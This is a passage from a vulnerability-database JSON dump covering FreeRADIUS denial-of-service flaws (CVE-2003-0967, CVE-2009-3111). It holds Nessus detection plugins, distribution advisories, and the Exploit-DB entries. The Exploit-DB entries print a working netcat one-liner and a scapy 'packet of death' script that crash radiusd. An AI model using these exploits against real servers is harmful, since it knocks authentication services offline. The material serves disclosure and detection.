value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-dbg\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-dialupadmin\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-iodbc\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-krb5\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-ldap\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-mysql\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-postgresql\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius / freeradius-dbg / freeradius-dialupadmin / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T10:40:14", "description": "freeRADIUS Vulnerability Notifications reports :\n\n2009.09.09 v1.1.7 - Anyone who can send packets to the server can\ncrash it by sending a Tunnel-Password attribute in an Access-Request\npacket. This vulnerability is not otherwise exploitable. We have\nreleased 1.1.8 to correct this vulnerability.\n\nThis issue is similar to the previous Tunnel-Password issue noted\nbelow. The vulnerable versions are 1.1.3 through 1.1.7. Version 2.x is\nnot affected.", "edition": 26, "published": "2009-12-15T00:00:00", "title": "FreeBSD : freeradius -- remote packet of death vulnerability (1b3f854b-e4bd-11de-b276-000d8787e1be)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "modified": "2009-12-15T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:freeradius"], "id": "FREEBSD_PKG_1B3F854BE4BD11DEB276000D8787E1BE.NASL", "href": "https://www.tenable.com/plugins/nessus/43161", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43161);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3111\");\n script_xref(name:\"EDB-ID\", value:\"9642\");\n\n script_name(english:\"FreeBSD : freeradius -- remote packet of death vulnerability (1b3f854b-e4bd-11de-b276-000d8787e1be)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"freeRADIUS Vulnerability Notifications reports :\n\n2009.09.09 v1.1.7 - Anyone who can send packets to the server can\ncrash it by sending a Tunnel-Password attribute 
in an Access-Request\npacket. This vulnerability is not otherwise exploitable. We have\nreleased 1.1.8 to correct this vulnerability.\n\nThis issue is similar to the previous Tunnel-Password issue noted\nbelow. The vulnerable versions are 1.1.3 through 1.1.7. Version 2.x is\nnot affected.\"\n );\n # http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3111\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://nvd.nist.gov/vuln/detail/CVE-2009-3111\"\n );\n # http://freeradius.org/security.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://freeradius.org/security/\"\n );\n # https://vuxml.freebsd.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?08ccb3ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"freeradius<1.1.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:02:25", "description": "This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. 
(CVE-2009-3111)", "edition": 23, "published": "2009-10-02T00:00:00", "title": "SuSE9 Security Update : freeradius (YOU Patch Number 12507)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "modified": "2009-10-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12507.NASL", "href": "https://www.tenable.com/plugins/nessus/41964", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41964);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3111\");\n\n script_name(english:\"SuSE9 Security Update : freeradius (YOU Patch Number 12507)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. 
(CVE-2009-3111)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3111.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12507.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"freeradius-1.0.5-2.21\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"freeradius-devel-1.0.5-2.21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not 
affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:44:06", "description": "This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)", "edition": 23, "published": "2009-10-02T00:00:00", "title": "SuSE 10 Security Update : freeradius (ZYPP Patch Number 6499)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "modified": "2009-10-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FREERADIUS-6499.NASL", "href": "https://www.tenable.com/plugins/nessus/41966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41966);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3111\");\n\n script_name(english:\"SuSE 10 Security Update : freeradius (ZYPP Patch Number 6499)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. 
(CVE-2009-3111)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3111.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6499.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"freeradius-1.1.0-19.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"freeradius-devel-1.1.0-19.14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host 
is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:44:06", "description": "This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)", "edition": 23, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : freeradius (ZYPP Patch Number 6528)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FREERADIUS-6528.NASL", "href": "https://www.tenable.com/plugins/nessus/49853", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49853);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3111\");\n\n script_name(english:\"SuSE 10 Security Update : freeradius (ZYPP Patch Number 6528)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. 
(CVE-2009-3111)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3111.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6528.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"freeradius-1.1.7-21.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"freeradius-devel-1.1.7-21.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The 
host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-05-29T14:33:45", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0967"], "description": "FreeRADIUS is an Internet authentication daemon, which implements the\nRADIUS protocol. It allows Network Access Servers (NAS boxes) to perform\nauthentication for dial-up users.\n\nThe rad_decode function in FreeRADIUS 0.9.2 and earlier allows remote\nattackers to cause a denial of service (crash) via a short RADIUS string\nattribute with a tag, which causes memcpy to be called with a -1 length\nargument, as demonstrated using the Tunnel-Password attribute. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2003-0967 to this issue.\n \nUsers of FreeRADIUS are advised to upgrade to these erratum packages\ncontaining FreeRADIUS 0.9.3 which is not vulnerable to these issues.", "modified": "2017-07-29T20:27:18", "published": "2003-12-10T05:00:00", "id": "RHSA-2003:386", "href": "https://access.redhat.com/errata/RHSA-2003:386", "type": "redhat", "title": "(RHSA-2003:386) freeradius security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:46:37", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "description": "FreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
After installing the\nupdate, radiusd will be restarted automatically.", "modified": "2017-09-08T11:59:39", "published": "2009-09-17T04:00:00", "id": "RHSA-2009:1451", "href": "https://access.redhat.com/errata/RHSA-2009:1451", "type": "redhat", "title": "(RHSA-2009:1451) Moderate: freeradius security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T20:54:03", "description": "FreeRADIUS 0.x/1.1.x Tag Field Heap Corruption Vulnerability. CVE-2003-0967. Dos exploit for linux platform", "published": "2003-11-20T00:00:00", "type": "exploitdb", "title": "FreeRADIUS 0.x/1.1.x Tag Field Heap Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0967"], "modified": "2003-11-20T00:00:00", "id": "EDB-ID:23391", "href": "https://www.exploit-db.com/exploits/23391/", "sourceData": "source: http://www.securityfocus.com/bid/9079/info\r\n\r\nFreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.\r\n\r\nThis issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.\r\n\r\nThis vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.\r\n\r\nUPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. 
FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.\r\n\r\nbash-2.05$ echo -ne \"\\x01\\x01\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x45\\x02\" | nc -vu -w1 <victim> <port>\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23391/"}, {"lastseen": "2016-02-01T11:03:06", "description": "FreeRadius < 1.1.8 Zero-length Tunnel-Password DoS Exploit (CVE-2009-3111). CVE-2009-3111. Dos exploits for multiple platform", "published": "2009-09-11T00:00:00", "type": "exploitdb", "title": "FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3111"], "modified": "2009-09-11T00:00:00", "id": "EDB-ID:9642", "href": "https://www.exploit-db.com/exploits/9642/", "sourceData": "#!/usr/bin/env python\r\n# FreeRadius Packet Of Death\r\n# Matthew Gillespie 2009-09-11\r\n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py\r\n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/\r\n\r\nimport sys\r\nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr\r\n\r\nif len(sys.argv) != 2:\r\n\tprint \"Usage: radius_killer.py <radiushost>\\n\"\r\n\tsys.exit(1)\r\n\r\nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\\r\n\tRadius(code=1,authenticator=\"\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\",id=180)/ \\\r\n\tRadiusAttr(type=69,value=\"\",len=2)\r\n\r\nsend(PoD)\r\n\r\n# milw0rm.com [2009-09-11]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9642/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0967"], "edition": 1, "description": "## Vulnerability Description\nFreeRADIUS 0.9.2, and earlier, contains a flaw that may allow a remote denial of service. 
The issue is triggered when the service receives a malformed packet, and results in loss of availability for the service. It is possible to crash the service due to a NULL pointer dereference bug, which can be exploited by sending an \"Access-Request\" packet containing a \"Tunnel-Password\" attribute.\n## Technical Description\nThe vulnerability is due to a boundary error caused by mishandling of certain tagged RADIUS attributes (e.g. the \"Tunnel-Password\" attribute). This may cause a heap overflow, which can be exploited by sending malformed packets to the service. Successful exploitation requires that the packets originate from an IP address listed as a RADIUS client. It is possible to crash the service due to a NULL pointer dereference bug, which can be exploited by sending an \"Access-Request\" packet containing a \"Tunnel-Password\" attribute.\n\n## Solution Description\nUpgrade to version 0.9.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nFreeRADIUS 0.9.2, and earlier, contains a flaw that may allow a remote denial of service. The issue is triggered when the service receives a malformed packet, and results in loss of availability for the service. 
It is possible to crash the service due to a NULL pointer dereference bug, which can be exploited by sending an \"Access-Request\" packet containing a \"Tunnel-Password\" attribute.\n## Manual Testing Notes\nPoC CODE: The following command will crash the radiusd daemon\n\nbash-2.05$ echo -ne \n\"\\x01\\x01\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x45\\x02\" \n| nc -vu -w1 <victim> <port> \n\n## References:\nVendor Specific Solution URL: ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz\n[Secunia Advisory ID:10271](https://secuniaresearch.flexerasoftware.com/advisories/10271/)\n[CVE-2003-0967](https://vulners.com/cve/CVE-2003-0967)\nBugtraq ID: 9079\n", "modified": "2003-11-20T03:12:14", "published": "2003-11-20T03:12:14", "href": "https://vulners.com/osvdb/OSVDB:2850", "id": "OSVDB:2850", "title": "FreeRADIUS Tagged Attribute Handling DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-08T23:31:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "description": "It was discovered that FreeRADIUS did not correctly handle certain \nmalformed attributes. 
A remote attacker could exploit this flaw and cause \nthe FreeRADIUS server to crash, resulting in a denial of service.", "edition": 5, "modified": "2009-09-16T00:00:00", "published": "2009-09-16T00:00:00", "id": "USN-832-1", "href": "https://ubuntu.com/security/notices/USN-832-1", "title": "FreeRADIUS vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:25:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1451\n\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
